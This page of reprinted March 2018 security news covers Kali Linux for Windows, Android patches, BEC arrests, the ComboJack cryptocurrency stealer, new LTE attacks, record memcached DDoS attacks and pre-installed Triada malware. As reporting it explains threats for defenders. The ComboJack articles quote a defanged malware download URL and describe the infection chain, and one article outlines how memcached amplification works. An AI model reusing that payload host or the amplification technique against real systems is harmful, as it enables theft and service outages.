English Articles -

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


 


Funny? Useful? Cool? Kali Linux natively on Windows 10
7.3.2018 securityaffairs  Safety

It’s funny, but it is true, the popular Kali Linux hacking distro is available for download on the official Microsoft App Store on Windows 10.
Kali Linux is now natively available on Windows 10, without requiring dual boot or virtualization.

Kali Linux isn’t the unique Linux distribution available on the Windows App Store, Windows users can download other popular distros, including as Ubuntu, Fedora, and OpenSUSE.

The Linux distribution can be used directly on Windows by exploiting the feature called Windows Subsystem for Linux (WSL)

“For the past few weeks, we’ve been working with the Microsoft WSL team to get Kali Linux introduced into the Microsoft App Store as an official WSL distribution, and today we’re happy to announce the availability of the ‘Kali Linux’ Windows application,” reads the announcement published on the Kali Linux website.

“For Windows 10 users, this means you can simply enable WSL, search for Kali in the Windows store, and install it with a single click. This is especially exciting news for penetration testers and security professionals who have limited toolsets due to enterprise compliance standards.”

To enable the WSL follow these steps:

Access the “Apps and features” menù item under the Control Panel
Select “Programs and Features” from the right panel
Click the “Turn Windows features on or off” from the left menu
Check the “Windows Subsystem for Linux”
Save the operation and Reboot the system
Kali Linux

Alternatively, users can open PowerShell as Administrator and run the following command before restarting the machine.
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
At this point, you can search for Kali Linux on Windows Store and download it.
Offensive Security has published a video to show how to use the distribution on Windows 10.

It is important to remind that the Kali Linux on Windows does not come with any hacking testing tools pre-installed, this means that you need to download them when needed.

Experts noticed that Antivirus software, including Windows Defender, can flag the distro’s packages as a malware.


BlackBerry Sues Facebook Over Messaging Apps
6.3.2018 securityweek
Social

Canadian telecommunications firm BlackBerry sued Facebook on Tuesday, accusing the American social media company of infringing on its patents for messaging apps.

BlackBerry is claiming infringement on patents it holds for message encryption and notifications, and is seeking an injunction as well as damages for lost profits, although no figure was given.

Facebook and its wholly-owned services Instagram and WhatsApp are named as defendants in the lawsuit.

"We have a lot of respect for Facebook and the value they've placed on messaging capabilities, some of which were invented by BlackBerry," BlackBerry spokeswoman Sarah McKinney said in a statement.

She said BlackBerry would like to partner with Facebrook "in our drive toward a securely connected future, and we continue to hold this door open to them."

"However, we have a strong claim that Facebook has infringed on our intellectual property, and after several years of dialogue, we also have an obligation to our shareholders to pursue appropriate legal remedies," McKinney added.

BlackBerry, after abandoning the manufacture of its once-popular smartphones, has refocused its core business on cybersecurity software and services.


World Economic Forum Announces New Fintech Cybersecurity Consortium
6.3.2018 securityweek Cyber

Following the announcement of a new Global Centre for Cybersecurity, the World Economic Forum (WEF) has today launched a new fintech-focused initiative: WEF's Fintech Cybersecurity Consortium. Its aim is to create a framework for the assessment of cybersecurity in financial technology firms and data aggregators.

The founding members of the new consortium include global bank Citigroup, insurance company Zurich Insurance Group, fintech lender Kabbage and financial infrastructure provider DTCC. Their intention is to develop common principles for cybersecurity assessments, guidance for implementation, a point-based scoring framework, and guidance on improving an organization's score.

"Cyber breaches recorded by businesses have almost doubled since 2013 and the estimated cost of cybercrime is $8 trillion over the next five years," said Mario Greco, Chief Executive Officer of Zurich Insurance Group, Switzerland, a participant in the consortium. "We expect the consortium to help adopt best cybersecurity practices and reduce the complexity of diverging cyber regulation around the world."

The $8 trillion figure comes from a May 2017 report from Juniper Research. More recently, McAfee reported that the cost of global cybercrime is $600 billion.

The new consortium will commence immediately, working closely with WEF's Global Centre for Cybersecurity being established in Geneva. It expects to draw upon a similar, domestic-focused project undertaken in 2017 by the US Chamber of Commerce on Critical Infrastructure Protection, Information Sharing and Cybersecurity. A detailed description is found in a separate whitepaper, Innovation-Driven Cyber-Risk to Customer Data in Financial Services (PDF).This paper makes it clear that the work will draw upon existing frameworks, with particular reference to NIST.

WEF spokesperson Georg Schmitt told SecurityWeek that the consortium is "doing this to step in where regulators might not (yet)." The paper makes it clear that recent cyber developments are considered to be a major threat to the financial sector. Two of these are the evolution of open banking driven by European finance legislation such as PSD2 ; and the customer privacy regulations, led perhaps by GDPR. The former increases fintech's attack surface, while rapid growth in the IoT and use of AI algorithms increases the amount of PII collected and stored.

"It's a smart move to highlight data aggregators as a point of cyber vulnerability," David Shrier, CEO of Distilled Analytics told SecurityWeek. "You have only to look at the Equifax hack to understand why this is important. And classically they are not considered fintechs, so it's worthwhile to call them out separately.

"Unknowingly," he adds, "in our race to adopt new technology over the past 20 years, we have ceded a massive amount of personal information to these third parties (data aggregator and fintech alike), and it has created gigantic cyber vulnerabilities."

Kabbage CEO Rob Frohwein explained: "Kabbage is joining the World Economic Forum consortium because cybersecurity is a never-ending, age-long issue that requires a long-lasting solution for tomorrow and not a Band-Aid for today. We need a living global standard that allows financial services companies to compete and work with incumbent institutions across borders and industries."

The Fintech Cybersecurity Consortium will develop a cybersecurity assessment framework for fintechs and data aggregators. This will, in theory, enable new firms to interconnect with fintech and aggregator firms with greater confidence.

Some firms will likely balk at yet another fintech framework-come-regulation, particularly since it will evolve from existing frameworks. "Unfortunately, this really doesn't change the game in any way (that I can tell)," comments Nathan Wenzler, chief security strategist at AsTech. "It is likely to get a, 'it's yet another regulation for us financial companies' kind of reaction. Yes, some financial firms might be interested. If this was any other industry besides finance, it might be something more significant. As it stands, they're pretty numb to all the regulatory requirements they deal with everywhere."

Shrier is more optimistic. "We have seen the WEF tackle other areas with paradigm-shifting thought leadership, so, provided they get the right experts in their working group, this could be additive to improving cybersecurity. While this new effort is not guaranteed to succeed, our problem today is too many headlines about cyber breaches and not enough systems thinking about cyber solutions. The WEF group has a chance to raise serious cyberthinking in the C-suite and board room proactively, instead of reactively after an incursion."


Two Scammers, Five Mules Arrested in BEC Bust
6.3.2018 securityweek
Spam

A criminal investigation commenced by the French National Gendarmerie in June 2016 led to the arrest of one French and one Belgian national on February 20, 2018 for their part in large scale CEO fraud (also known as business email compromise -- BEC).

According to Europol, "The criminals belonged to an organized crime group involved in at least 24 cases of CEO fraud causing €4.6 million worth of damage."

The investigation was launched when French law enforcement was informed that two companies had fallen victim to BEC fraud, with a total estimated cost of €1.2 million. Since then, the investigation has identified 15 alleged Romanian company managers living in France and Belgian involved in orchestrating BEC fraud and Forex scams. Money obtained from the BEC scams was sent via the Romanian company accounts to Hong Kong.

The two suspects arrested in France are thought to be recruiters and facilitators for the criminal gang; but not the masterminds. "The suspects arrested in Paris and Lille seem to be closely linked to the ring leader(s) most probably hiding in Israel, where computers and mobile phones have also been seized," announced Europol on Friday.

A further five individuals were arrested in Belgium, suspected of acting as money mules for the gang.

BEC fraud has become a major problem over the last few years. According to figures from the FBI, worldwide BEC fraud netted $2.3 billion from 17,642 victims in at least 79 countries from October 2013 through February 2016.

A typical BEC scam will persuade an authorized employee to wire money to an external account. It is a sophisticated version -- with much higher stakes -- of the pre-internet fax directory scam where a fake invoice is sent to a company because it often just gets paid. It is similar in operation to targeted spear-phishing using a disguised sender and social engineering to trick the target. Typically, it is an email disguised to appear as if it comes from the CEO (hence its common description as CEO fraud), asking the finance director to urgently mail funds to or for a supplier or partner.

In this instance, the two arrested in France helped people to establish firms with Romanian bank accounts. According to Europol these included law firms and notaries. An apparent email from the CEO asking for funds to be sent to a law firm in France acting on behalf of a known or fictitious supplier could appear both safe and compelling.

Unlike phishing, BEC carries no payload in the form of a malicious link or weaponized attachment. Without such a payload to detect, BEC emails are very difficult to flag with technology.

In February, Agari published a trends analysis (PDF) of BEC. It found that in the second half of 2017, an average of 45 BEC attacks per company bypassed secure email gateways (SEG), advanced threat protection systems (APT), and targeted attack protection (TAP); 96% or organizations had experienced BEC attacks; and one company had experienced 369 attacks.

DMARC can help prevent BEC, but is not foolproof. Furthermore, Agari points out that 67% of the Fortune 500 do not have a DMARC policy, and only 5% have a Reject (or “blocking”) policy on their corporate domain.

Because of the difficulties in detecting BEC attacks, there have been several major successful examples during 2017. In April 2017, the Justice Department disclosed that Google and Facebook lost a combined $100 million to BEC attacks impersonating their server hardware supplier Quanta. In June 2017, New York Judge Lori Sattler was duped into sending $1,057,500 to a scammer posing as her lawyer in a real estate deal. In August 2017, MacEwan University in Alberta, Canada was defrauded of $11.8 million in a BEC attack impersonating a vendor of the university.


Android's March 2018 Patches Fix Critical, High Risk Flaws
6.3.2018 securityweek Android

Google has released its March 2018 set of security updates for Android to address numerous Critical and High severity vulnerabilities in the popular mobile operating system.

The majority of the Critical vulnerabilities addressed this month could allow an attacker to execute code remotely on affected devices. Impacted components include media framework, system, and kernel, Nvidia, and Qualcomm components.

A total of 16 vulnerabilities were addressed as part of the 2018-03-01 security patch level: 8 rated Critical severity and 8 considered High risk. The most severe of these vulnerabilities could allow a remote attacker using a specially crafted file to run arbitrary code with high privileges.

Four of the Critical flaws (three remote code execution bugs and one elevation of privilege issue) and two High risk bugs (elevation of privilege) were addressed in media framework. The remaining four Critical vulnerabilities (all remote code execution) and six High risk issues (information disclosure bugs) were resolved in system.

The 2018-03-05 security patch level addressed 21 vulnerabilities, only three of which were rated Critical severity. All of the remaining bugs were assessed High risk, Google notes in an advisory.

The flaws affect Kernel components (two elevation of privilege and four information disclosure High risk issues), NVIDIA components (two High risk elevation of privilege bugs), Qualcomm components (two Critical – remote code execution – and nine High risk – six elevation of privilege, two information disclosure, and one denial of service – vulnerabilities), and Qualcomm closed-source components (one Critical and one High risk).

Google also addressed over 40 vulnerabilities impacting its Pixel / Nexus devices this month, most of them rated Moderate severity.

A Moderate risk elevation of privilege issue was patched in framework, 2 High severity denial of service bugs were resolved in Media framework, and 2 elevation of privilege and 2 information disclosure vulnerabilities were fixed in system, all four Medium risk.

Google also addressed 1 High risk information disclosure and 5 Moderate elevation of privilege issues in kernel components, 3 moderate information disclosure bugs in Nvidia components, and 18 elevation of privilege and 9 information disclosure issues in Qualcomm components (all Moderate severity).

Pixel 2 and Pixel 2 XL devices also received fixes for several functionality issues that were not related to the security of these devices. Instead, they improved screen wake performance with fingerprint unlock, audio performance when recording video, and crash reporting.


Kaspersky Lab Offers $100,000 for Critical Vulnerabilities
6.3.2018 securityweek
Vulnerebility

Just days before its annual Security Analyst Summit kicks off in Cancun, Mexico, Kaspersky Lab this week announced an extension to its bug bounty program and plans to pay rewards of up to $100,000 for severe vulnerabilities in some of its products.

Launched in August 2016, the HackerOne-powered bug bounty program initially promised a total of $50,000 in bounties and resulted in the discovery of more than 20 flaws in the first six months. To date, the program allowed Kaspersky to address more than 70 bugs in its products and services.

In April last year, the Moscow-based security firm announced the addition of Kaspersky Password Manager 8 to the bounty program, along with an increase in the maximum reward for remote code execution vulnerabilities from $2,000 to $5,000.

The newly announced larger payouts represent a 20-fold increase on existing rewards available to researchers who participate in the company’s bug bounty program, which is available to all members of the HackerOne platform.

The largest rewards will be offered for the discovery and coordinated disclosure of bugs that enable remote code execution via the product database update channel, Kaspersky says. Another requirement is that the launch of the code takes place in the product’s high privilege process and silently from the user, and that persistence is also achieved.

Security flaws leading to other types of remote code execution will receive rewards ranging from $5,000 to $20,000, depending on their complexity level. The company also announced it is willing to pay researchers who discover bugs allowing local privilege escalation or leading to sensitive data disclosure.

Only previously unknown vulnerabilities discovered in Kaspersky Internet Security 2019 (the most recent beta) and Kaspersky Endpoint Security 11 (the most recent beta) qualify for the bug bounties. Supported platforms include desktop Windows 8.1 and higher, with the most recent updates installed.

“Finding and fixing bugs is a priority for us as a software company. We invite security researchers to make sure there are no vulnerabilities in our products. The immunity of our code and highest levels of protection that we offer customers is a core principal of our business – and a fundamental pillar of our Global Transparency Initiative,” Eugene Kaspersky, CEO of Kaspersky Lab, said.

Announced in October 2017, the Global Transparency Initiative was meant to clear Kaspersky’s name after reports suggested it had ties to the Russian government and the Department of Homeland Security (DHS) ordered all government agencies to stop using the company’s products.


"ComboJack" Malware Steals Multiple Virtual Currencies
6.3.2018 securityweek Cryptocurrency

A newly discovered piece of malware is capable of stealing a variety of crypto-coins from its victims by replacing legitimate wallet addresses with that of the attacker.

Dubbed ComboJack, the malware performs its nefarious activity by monitoring the user clipboard and replacing targeted addresses there. This is the same technique that was recently observed being used by the Evrial Trojan and the CryptoShuffler malware, but the new threat targets multiple virtual currencies.

ComboJack, Palo Alto Networks has discovered, is targeting multiple crypto-currencies at the moment, including Bitcoin, Litecoin, Monero, and Ethereum.

The malware is being distributed through spam emails targeting users in Japan and America, carrying a malicious PDF that contains an embedded document. This is a RTF file attempting to exploit CVE-2017-8579, a vulnerability addressed in September 2017 after it was abused to spread the FinFisher spyware.

The RTF document references to an embedded remote object, an HTA file that contains encoded PowerShell commands. Once fetched from the remote server, the file executes the PowerShell to download and execute the final payload.

The downloaded file is an initial stage self-extracting executable (SFX) that extracts the second stage, a password protected SFX that has the password supplied by the first stage. Only after the second stage is executed, the ComboJack is extracted.

First, the malware copies itself to the ProgramData folder, and then leverages the attrib.exe built-in Windows tool to set the hidden and system attributes to itself. Next, the malware sets a registry key to achieve persistence.

Once the steps have been completed, ComboJack starts checking the contents of the clipboard every half second to determine if wallet information for different digital currencies has been copied there. When that happens, the malware replaces the information with hardcoded data in an attempt to divert funds to a presumably attacker-owned wallet.

“This tactic relies on the fact that wallet addresses are typically long and complex and to prevent errors, most users will opt to copy an exact string in order to prevent potential errors,” Palo Alto points out.

The malware can detect addresses of crypto-currencies such as Ethereum, Monero (erroneously, the replacement address is shorter), Bitcoin, Litecoin, Qiwi, WebMoney (Rubles), WebMoney (USD), Yandex Money, and a currently unknown virtual coin.

The fact that ComboJack is targeting WebMoney (USD, EUR, and RUB) and Yandex Money, which are popular digital payment systems, also sets the malware apart from other Trojans capable of stealing crypto-currencies by replacing wallet addresses that have been copied to the clipboard.

“By targeting multiple cryptocurrencies and web based wallets, the author of ComboJack appears to be hedging his or her bets on which currency will boom and which will bust. As the prices of cryptocurrencies continue to rise it is likely we will see more and more malware targeting cryptocurrencies, as it presents the fastest way to the highest profit,” Palo Alto concludes.


Researchers Devise New Attacks Against 4G LTE Mobile Networks
6.3.2018 securityweek Mobil 
Attack

A team of researchers from Purdue University and the University of Iowa have discovered 10 new attacks against the 4G LTE protocol, which could allow adversaries snoop on messages, deny service, and even track the location of users.

In a whitepaper (PDF), the team provides information on LTEInspector, the adversarial model-based testing approach they decided to adopt in this quest, and on the 10 new vulnerabilities they discovered in the protocol, alongside 9 previously known attacks.

LTEInspector, the researchers explain, was designed to analyze three critical procedures in the 4G LTE network, namely attach, detach, and paging. Designed to be tool-agnostic, the new approach can be “instantiated through any generic symbolic model checker and cryptographic protocol verifier,” the researchers say.

Using the new approach, the researchers discovered undocumented attacks on each of the critical procedures in the protocol. Four of the attacks affect the attach procedure, one affects the detach procedure, and five affect paging.

The first such attack is called Authentication Synchronization Failure and could disrupt the attach procedure, thus resulting in the victim experiencing service disruption.

A Traceability Attack can be abused to track a particular victim user equipment. “This attack can also be performed for a specific user with only the knowledge of victim’s phone number,” the researchers say.

The Numb Attack allows the adversary to inject an out-of-sequence control-plane protocol message and disrupt the service of a victim user device until restart. This issue can be chained with other types of assaults to impersonate the victim.

A Paging Channel Hijacking attack enables an adversary to hijack the victim device’s paging channel, thus preventing it from receiving legitimate paging messages, meaning that the victim does not receive service notifications such as incoming phone calls or SMS.

A Stealthy kicking-off Attack results in the user device disconnecting from the Evolved Packet Core (EPC) and can be used as a prerequisite of the Authentication Relay Attack.

As part of a Panic Attack, an adversary injects fake emergency paging messages to a large number of user devices, thus creating artificial emergency.

An adversary could also launch Energy Depletion Attacks to make user devices “perform expensive cryptographic operations,” by forcing them to repeatedly carry out the expensive attach procedure.

The Linkability Attack, the researchers say, would allow an adversary to trace a victim device in a cell area by broadcasting a paging with the victim’s IMSI and observing the received attach request.

The only attack against the detach procedure is the Detach/Downgrade Attack, where the adversary injects network initiated detach requests to disrupt the victim’s service.

The researchers also point out that it is possible to chain some of these attacks with previously known assault methods, as well as among them, which could have wider implications. One such attack is the Authentication Relay Attack, where the victim device is disconnected from the EPC and the adversary connects instead, impersonating it, despite the lack of proper credentials.

“In this attack the adversary, however, cannot decrypt or inject valid encrypted messages unless the operator uses a weak or no security context,” the researchers explain.


ComboJack Malware alters Windows clipboards to steal cryptocurrencies and payments
6.3.2018 securityweek Cryptocurrency

Palo Alto Networks discovered a malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address and alter clipboards to steal cryptocurrencies and payments.
Crooks continue to focus their interest in cryptocurrencies, security researchers at Palo Alto Networks have spotted a strain of malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address to the Windows clipboard. The malicious code then replaces the address in the clipboard with the author’s one.

“Unit 42 researchers have discovered a new currency stealer which targets cryptocurrencies and online wallets. “CryptoJack” functions by replacing clipboard addresses with an attacker-controlled address which sends funds into the attacker’s wallet.” reads the analysis published by PaloAlto. “This technique relies on victims not checking the destination wallet prior to finalizing a transaction.”

Unlike other similar threats, ComboJack supports multiple cryptocurrencies, including Bitcoin, Litecoin, Monero, and Ethereum and it is also able to target other digital payment systems such as Qiwi, Yandex Money, and WebMoney (USD and ruble payments).

In 2017, CryptoShuffler was the first malware to implement this technique to targets online Bitcoin wallets, in February 2018 researchers at ElevenPaths discovered a crypto coin malware stealer called Evrial which takes control of the clipboard to get “easy money”.

Experts from PaloAlto Networks, along with Proofpoint experts, were investigating a malspam campaign targeting Japanese and American users.

The spam messages attempt to trick victims into opening the PDF attachment by claiming a passport was lost and that the attached PDF contained a scanned copy of the document.

ComboJack malware

Attackers implemented an attack chain already observed for the distribution of the Dridex banking trojan and Locky ransomware in 2017.

When the user opens the PDF document, the file opens an RTF file that contains an embedded HTA object that attempts to exploit the CVE-2017-8579 DirectX flaw.

“This embedded remote object is an HTA file which was located at hXXps://a.doko[.]moe/tnejln which contains encoded PowerShell commands.” continues the analysis.

The SFX file downloads and runs a password-protected SFX that then finally delivers ComboJack.

Finally, the payload sets a registry key to ensure persistence.

Combojack

ComboJack checks the Windows clipboard every half-a-second for new content that matches a known pattern for a cryptocurrency or payment system address, then it replaces the address with one from an internal list.

The malicious code exploits the fact that walled addresses are difficult to remind and most users opt to copy an exact string in order to prevent potential errors.

Users are advised to carefully check that the cryptocurrency payment addresses they copy-pasted are identical in the source and destination locations.

“By targeting multiple cryptocurrencies and web based wallets, the author of ComboJack appears to be hedging his or her bets on which currency will boom and which will bust.” concludes PaloAlto Networks.

“As the prices of cryptocurrencies continue to rise it is likely we will see more and more malware targeting cryptocurrencies, as it presents the fastest way to the highest profit.”

Further details, including IOCs are available in the analysis.


World’s largest DDoS attack record broken by a new memcached DDoS attack
6.3.2018 securityweek
Attack

World’s largest DDoS attack record lasted just a few days, Arbor Networks reported that earlier this month a US service provider suffered a 1.7Tbps memcached DDoS attack.
On February 28, 2018, the code hosting website GitHub was hit by the largest-ever DDoS attack that peaked at 1.3Tbps. The powerful attack was abusing the memcached protocol to power so-called memcached DDoS attacks.

Memcached is a free and open source, high-performance, distributed memory caching system designed to speed up dynamic web applications by alleviating database load.

Clients communicate with memcached servers via TCP or UDP on port 11211.

Researchers from Cloudflare, Arbor Networks and security firm Qihoo 360 discovered that recently attackers are abusing the memcached for DDoS amplification attacks.

The abuse of memcached servers in DDoS Attacks is quite simple, the attacker sends a request to the targeted server on port 11211 spoofing the IP address of the victim. In a memcached DDoS attack, the request sent to the server is composed of a few bytes, while the response can be tens of thousands of times bigger, resulting in an amplification attack.

Experts at Cloudflare dubbed this type of attack Memcrashed, according to the researcher the amplification technique could allow attackers to obtain an amplification factor of 51,200.

Researchers predicted then that threat actors in the wild would abuse misconfigured Memcached servers in future attacks, and it is exactly what is happening.

Experts at Arbor Networks reported that earlier this month a US service provider suffered a 1.7Tbps DDoS attack. The service provider was able to repel the attack thanks to adequate countermeasures, but we can consider it an exception because a so huge volume of traffic is able to take off the majority of websites online.

The experts confirmed that also in this case attackers exploited unsecured memcached database servers to amplify attacks.

“Today, NETSCOUT Arbor can confirm a 1.7Tbps reflection/amplification attack targeted at a customer of a U.S. based Service Provider has been recorded by our ATLAS global traffic and DDoS threat data system.” reported Arbor Networks. “The attack was based on the same memcached reflection/amplification attack vector that made up the Github attack”

memcached DDoS attack Mar2018

The previous record DDoS attack was observed by ATLAS in 2016, it was a 650Gbps attack towards a target in Brazil.

Unfortunately the availability online of unsecured memcached servers will allow threat actors to power similar attacks in the future.

“While the internet community is coming together to shut down access to the many open mecached servers out there, the sheer number of servers running memcached openly will make this a lasting vulnerability that attackers will exploit,” continues the post published by Arbor Networks.

“It is critically important for companies to take the necessary steps to protect themselves.”

Cloudflare recommends disabling UDP support unless it’s needed and isolating memcached servers from the Internet. Internet service providers have to fix vulnerable protocols and prevent IP spoofing.

“Internet Service Providers – In order to defeat such attacks in future, we need to fix vulnerable protocols and also IP spoofing. As long as IP spoofing is permissible on the internet, we’ll be in trouble.” concluded Cloudflare.

“Developers – Please please please: Stop using UDP. If you must, please don’t enable it by default. If you do not know what an amplification attack is I hereby forbid you from ever typing SOCK_DGRAM into your editor.”

The fear for this new kind of attack represents a good opportunity for cyber criminals, crooks already started to blackmail companies asking for a ransom demand in Monero cryptocurrency to avoid being attacked via Memcached servers.

Let’s see how long the 1.7Tbps attack will remain the largest-ever DDoS attack …


Mobile Banking Trojans Targeting Crypto-Currencies
6.3.2018 securityweek Mobil  Android

Mobile malware is now targeting crypto-currencies with the intent of stealing victims’ funds, IBM says.

The immediate result of the massive increase in value that crypto-currencies have registered over the past year was the growth of malicious attacks attempting to steal coins from unsuspecting users. While most of these assaults involved PC malware so far, recent incidents have shown that mobile threats are picking up the pace as well.

Several weeks ago, IBM observed that the TrickBot Trojan was using webinjections to steal virtual coins from its victims by replacing legitimate addresses with those of the attacker. Working in a similar manner, mobile malware is now using screen overlays to trick victims into sending funds to the attacker instead, IBM's security researchers discovered.

According to IBM, mobile malware targeting crypto-coins usually leverages malicious miners to collect coins, but the practice isn’t that profitable, given the limited processing power a mobile device has. Furthermore, users are more likely to discover a mining operation on a mobile device when observing overheating, low performance and faster battery drain.

“Crooks operating mobile banking Trojans don’t install miners on the device. Rather, they typically steal existing coins from unsuspecting owners using mobile malware that creates the same effect as webinjections: cybercriminals trick users with fake on-screen information, steal their access credentials and take over accounts to empty coins into their own wallets,” IBM notes.

Some of the mobile malware families capable of detecting the application opened on a mobile device include ExoBot, BankBot, Marcher, and Mazar. Based on the launched application, these Trojans can display a hardcoded or dynamically fetched overlay and hide the legitimate app screen behind a fake one.

Thus, users end up revealing their credentials to the malware operators, which can then abuse them to access the victim’s account. If a second-factor authorization is required, the malware can hijack it from the compromised device without alerting the victim.

Usually employed in attacks targeting bank accounts, the method has been adapted for the theft of crypto-coins as well, the researchers discovered. Trojans such as BankBot and Marcher have been already packed with the necessary functionality to overlay a fake screen when the user opens relevant wallet apps.

The malware, IBM says, targets multiple virtual currencies, including Bitcoin, Bitcoin Cash, Ethereum, Litecoin, Monero, and other. Although basic-looking, the overlay screens are convincing and can trick users into unknowingly sending their access credentials to an attacker.

“The mobile malware arena already strives to emulate the success of PC banking Trojans and facilitate cross-channel fraud and identity theft. Cryptocurrency is just another target for malware operators looking to get in on the action. Given the rapid evolution of this threat, organizations should invest in mobile threat protection tools to minimize the risk posed by mobile banking Trojans,” IBM concludes.


Cisco Adds Vulnerability Identification to Tetration Platform
6.3.2018 securityweek
Vulnerebility

Cisco today announced the availability of identification of software vulnerabilities and exposures as part of the security capabilities of its Tetration platform.

Designed to offer workload protection for multi-cloud data centers through a zero-trust model that employs segmentation, the platform can now also detect vulnerabilities associated with software installed on servers.

With support for both on-premises and public cloud workloads, Tetration can now help identify security incidents faster, as well as contain lateral movement, in addition to reducing attack surface, Cisco says.

“Tetration is equipped to identify high severity security events such as Spectre and Meltdown using behavior-based anomalies,” Cisco notes.

The platform maintains an inventory of the software packages installed on the server, along with information on version and publisher. Leveraging the Common Vulnerabilities and Exposure (CVE) database, Tetration can detect packages with known CVEs.

The platform also offers a scorecard ranking the severity of specific vulnerabilities and reveals which servers might be affected, thus helping IT organizations proactively set up filters to find additional vulnerabilities.

Now, Tetration can also collect and maintain information about running processes on each server, on a real-time basis, Cisco announced. This should help IT managers find servers on which specific processes are running or have run. The collected information includes ID, parameters, duration, hash (signature), and the user running the process.

The identification of application behavior deviations from the baseline is also available on the platform, through the monitoring of workloads and networks for behavior that might be suspicious. Tetration first creates an application behavior baseline and then keeps an eye out for any deviations to identify attacks.

“For example, a process might seek to obtain privileged access that it should not have under normal behavior and use that privilege to execute a series of operations. Tetration can provide a time-series view of history to visualize process hierarchy and behavior information,” Cisco says.

The platform can search for specific process events and discover details such as privilege escalation, shell code execution, and side channel attacks.

According to Cisco, process behavior monitoring and identification of vulnerabilities allow Tetration to identify anomalies in minutes and reduce the attack surface up to 85%, while efficient application segmentation minimizes lateral movement. Furthermore, automation allows for a 70% reduction in human intervention to enable a zero-trust model.

“Tetration is powered by big data technologies to support the scale requirements of data centers. It can process comprehensive telemetry information received from servers in real-time (up to 25,000 servers per cluster). Tetration can enforce consistent policy across thousands of applications and tens of millions of policy rules,” Cisco notes.


Facebook improves link security infrastructure by implementing HSTS Preloading
6.3.2018 securityaffairs
Social

Facebook has implemented HSTS preloading that instructs a browser to always use SSL/TLS to communicate with eligible websites.
Facebook has upgraded its link security infrastructure to include HTTP Strict Transport Security (HSTS) preloading that instructs a browser to always use SSL/TLS to communicate with eligible websites.

Facebook and Instagram links will automatically update from HTTP to HTTPS for eligible websites.

“We have recently upgraded our link security infrastructure to include HSTS preloading, which automatically upgrades HTTP links to HTTPS for eligible websites. This will improve people’s security and will also often improve the speed of navigation to sites from Facebook.” reads the announcement published by Facebook.

According to Facebook, the modification aims to improve security and navigation speed for Facebook and Instagram links.
HSTS Preloading Facebook
Facebook determines the links that are eligible for HTTPS based on two sources:

The Chromium preload list, that is currently used in most major browsers;
Recording HSTS headers from sites shared on Facebook, in this case, the browser preload list is updated with any sites that serve HSTS with the preload directive.
Facebook invites websites to support HTTPs and sponsors Let’s Encrypt initiative which provides free TLS certificates and instructions on how to enable HTTPS for most common server software.


Triada Trojan Pre-Installed on Low Cost Android Smartphones
5.3.2018 securityweek Android

Security researchers have discovered the sophisticated Triada Trojan in the firmware of more than 40 low-cost Android smartphone models.

Discovered in early 2016 and considered one of the most advanced mobile threats out there, Triada stands out in the crowd because it abuses the Zygote parent process to inject its code in the context of all software on the device. The Trojan uses root privileges to replace system files and resides mainly in the device’s RAM, which makes it difficult to detect.

In April last year, security researchers discovered that Triada had adopted sandbox technology in an attempt to boost its detection evasion capabilities. Specifically, the malware was using the open source sandbox DroidPlugin, which allowed it to dynamically load and run code going through the installation process.

Several months later, in July 2017, Doctor Web reported that Triada was present in the firmware of several low-cost Android smartphones. At the time, the list of infected device models included Leagoo M5 Plus, Leagoo M8, Nomu S10, and Nomu S20.

Now, the security firm reveals that the Trojan comes pre-installed on a larger number of Android smartphone models, even on devices that were launched in December 2017. Overall, over 40 device models were found to be impacted, the security researchers say.

The specific malware variant found on these devices is detected as Android.Triada.231 and includes all of the capabilities a member of the Triada family comes with: it injects its module in the Zygote process to penetrate all running applications on the device.

This allows the Trojan to carry out a broad range of malicious activities without user interaction, such as covertly downloading and launching applications. Designed with a modular architecture, Triada can redirect financial SMS transactions to buy additional content or steal money from the user.

Because the malware authors managed to inject Android.Triada.231 into the libandroid_runtime.so system library, they are able to compromise a device’s firmware during the manufacturing process, and users end up receiving smartphones that have been already infected.

Doctor Web says they notified manufacturers who produced infected devices of the compromise last year, but infected models continue to be produced. One of these is the Leagoo M9 smartphone, which was announced in December 2017.

“Additionally, our analysts’ research showed that the Trojan’s penetration into firmware happened at request of the Leagoo partner, the software developer from Shanghai. This company provided Leagoo with one of its applications to be included into an image of the mobile operating system, as well as with an instruction to add third-party code into the system libraries before their compilation,” Doctor Web says.

Despite this controversial request, the manufacturer didn’t become suspicious and the Trojan ended up on the new smartphone model without any obstacles.

The security researchers also discovered that the malicious application was signed with the same certificate as Android.MulDrop.924, a Trojan discovered in 2016. This suggests that the developer requesting the addition of the code into the mobile operating system image might be involved in the distribution of Triada.

Doctor Web published a list of the 40 device models infected with Triada, but warns that the list might not be comprehensive, as other compromised smartphones could exist out there. Impacted manufacturers include Leagoo, ARK, Zopo, Doogee, Vertex, Advan, Cubot, Prestigio, Pelitt, and more.

“Such widespread distribution of Android.Triada.231 shows that many Android device manufacturers pay little attention to security questions and penetration of the Trojan code into system components. This can be due to error or malicious intent and is likely common practice,” the researchers point out.


Payment Card Breach Hits Some Applebee's Restaurants
5.3.2018 securityweek
Virus

RMH Franchise Holdings revealed on Friday that malware had been found on point-of-sale (PoS) systems at the Applebee’s restaurants it operates as a franchise.

RMH disclosed the incident on Friday afternoon, which often indicates an attempt to avoid the news cycle and fly under the radar. The company posted a link to the data breach notice on the homepage of its website, but it did not announce anything on social media.

According to the data breach notice, the incident affects more than 160 restaurants in Alabama, Arizona, Florida, Illinois, Indiana, Kansas, Kentucky, Missouri, Mississippi, Nebraska, Ohio, Pennsylvania, Texas and Wyoming. This represents nearly all the restaurants operated by RMH.

In a vast majority of cases, the malware was present on PoS systems between December 6, 2017 and January 2, 2018, but in a small number of restaurants the malware had been active since November 23 or December 5, 2017. The company said the breach does not impact payments made online or using self-pay tabletop devices.

The breach was discovered on February 13 and RMH launched an investigation in cooperation with cybersecurity experts and law enforcement.

The company said the malware was designed to collect names, credit or debit card numbers, expiration dates, and card verification codes.

RMH pointed out that its payment systems are isolated from the broader Applebee’s network, which is not affected by this incident.

“Moving forward, RMH is continuing to closely monitor its systems and review its security measures to help prevent something like this from happening again,” RMH said. “RMH is pleased to report that the incident has been contained and guests may use their cards with confidence at the RMH Applebee’s locations that were affected by this incident.”

